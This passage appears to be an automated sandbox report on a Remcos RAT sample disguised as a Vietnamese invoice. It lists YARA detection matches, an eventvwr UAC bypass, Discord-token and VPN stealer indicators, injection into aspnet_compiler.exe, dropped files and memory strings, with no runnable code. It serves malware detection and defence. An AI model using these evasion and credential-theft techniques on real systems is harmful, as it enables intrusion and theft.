Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0043610D	14_2_0043610D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00447310	14_2_00447310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044A490	14_2_0044A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0040755A	14_2_0040755A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0043C560	14_2_0043C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044B610	14_2_0044B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044D6C0	14_2_0044D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_004476F0	14_2_004476F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044B870	14_2_0044B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044081D	14_2_0044081D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00414957	14_2_00414957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_004079EE	14_2_004079EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00407AEB	14_2_00407AEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044AA80	14_2_0044AA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00412AA9	14_2_00412AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00404B74	14_2_00404B74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00404B03	14_2_00404B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044BBD8	14_2_0044BBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00404BE5	14_2_00404BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00404C76	14_2_00404C76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00415CFE	14_2_00415CFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00416D72	14_2_00416D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00446D30	14_2_00446D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00446D8B	14_2_00446D8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00406E8F	14_2_00406E8F

Uses 32bit PE files

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00416760 appears 69 times

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	14_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00401806 NtdllDefWindowProc_W,	14_2_00401806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_004018C0 NtdllDefWindowProc_W,	14_2_004018C0

Sample file is different than original file name gathered from version info

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000000.251222049.0000000000182000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCgfcxatykt.exe" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.365213489.0000000007610000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameVgnaaeoogibheqcdzitcbxs.dll" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000003.271856566.0000000003772000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVgnaaeoogibheqcdzitcbxs.dll" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Binary or memory string: OriginalFilenameCgfcxatykt.exe" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

File created: C:\Users\user\AppData\Roaming\Yqxsvaorwni

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@65/22@19/5

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,

14_2_004182CE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,

14_2_0040B58D

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	ReversingLabs: Detection: 27%
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Virustotal: Detection: 30%

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

File read: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Jump to behavior

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgi0vwrh.uo4.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,

14_2_00418758

Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, aspnet_compiler.exe, 0000000F.00000002.365717220.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: aspnet_compiler.exe, 0000000E.00000003.395805879.0000000002755000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.418724773.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.444163305.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.475835052.0000000003013000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.500353883.00000000028B7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.511362644.0000000000A53000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,

14_2_00413D4C

